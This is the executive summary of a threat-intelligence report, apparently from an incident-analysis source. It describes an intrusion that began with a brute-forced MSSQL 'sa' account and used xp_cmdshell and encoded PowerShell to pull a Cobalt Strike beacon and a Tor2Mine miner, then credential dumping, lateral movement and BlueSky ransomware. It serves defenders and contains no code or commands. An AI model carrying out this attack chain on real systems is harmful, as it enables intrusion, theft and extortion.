SQL Brute Force Leads to BlueSky Ransomware

#### Executive summary In December 2022 attackers brute-forced an exposed MSSQL server 'sa' account, enabled xp_cmdshell to execute base64-encoded PowerShell which pulled down a Cobalt Strike beacon and Tor2Mine payload; the intruders performed process injection, credential dumping and lateral movement (via remote service creation/SMB) and deployed BlueSky ransomware (vmware.exe) that encrypted network shares within ~32 minutes. The report provides C2 details, full Cobalt Strike config, miner and ransomware hashes, IOCs (IPs, URIs), Sigma/Yara detections, and recommended hunting signatures.